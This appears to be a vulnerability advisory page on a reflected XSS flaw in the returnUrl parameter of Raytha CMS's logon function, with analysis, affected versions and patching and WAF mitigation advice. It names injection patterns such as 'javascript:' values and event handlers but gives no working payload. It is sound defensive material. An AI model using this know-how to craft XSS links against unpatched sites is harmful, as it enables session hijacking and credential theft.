EUVD-2025-208715CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Lifecycle Timeline
3Tags
Description
Raytha CMS is vulnerable to Reflected XSS via returnUrl parameter in logon functionality. An attacker can craft a malicious URL which, when opened by the authenticated victim, results in arbitrary JavaScript execution in the victim’s browser. This issue was fixed in 1.4.6.
Analysis
Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl parameter that allows attackers to inject arbitrary JavaScript code. When an authenticated victim clicks a malicious URL crafted by an attacker, the injected script executes in the victim's browser with the victim's privileges, potentially enabling session hijacking, credential theft, or unauthorized actions within the CMS. The vulnerability was remediated in version 1.4.6, and while no CVSS score or EPSS data is currently available, the nature of XSS in authentication contexts represents a significant security risk requiring prompt patching.
Technical Context
This vulnerability is a Reflected XSS flaw classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), a critical web application vulnerability class. The returnUrl parameter in Raytha CMS's logon endpoint fails to properly sanitize or validate user-supplied input before reflecting it back into HTTP responses. Raytha CMS is a content management system platform, and the logon functionality represents a security-critical component where user authentication state is established. The vulnerability exists because the application likely constructs redirect URLs or displays user-controlled data without encoding or filtering special characters (such as angle brackets, quotes, or event handlers) that have meaning in HTML and JavaScript contexts. When an attacker-controlled value in returnUrl is embedded into an HTML response without proper output encoding, the browser interprets embedded JavaScript tags or event handlers as executable code rather than plain text.
Affected Products
Raytha CMS versions prior to 1.4.6 are affected by this vulnerability. Organizations running Raytha CMS should verify their current version and confirm whether they are below the patched release. The vulnerability specifically impacts the logon functionality and returnUrl parameter handling within the authentication module. Exact CPE identifiers and vendor advisory URLs were not provided in the available intelligence; however, administrators should consult Raytha CMS's official security announcements and release notes to confirm version applicability and obtain the patched release.
Remediation
Upgrade Raytha CMS to version 1.4.6 or later immediately to remediate this vulnerability. This patch release includes input validation and output encoding fixes for the returnUrl parameter in the logon endpoint. Organizations unable to patch immediately should implement temporary mitigations: enforce strict Content Security Policy (CSP) headers to restrict script execution sources, deploy a Web Application Firewall (WAF) rule to detect and block malicious returnUrl patterns (such as those containing 'javascript:', event handlers, or encoded script tags), restrict user access to the logon endpoint to trusted IP ranges if feasible, and educate users to avoid clicking suspicious links in emails or messages. Additionally, monitor CMS logs for unusual activity in the logon endpoint. Once patching is completed, verify the fix by testing the returnUrl parameter with common XSS payloads to confirm proper encoding.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today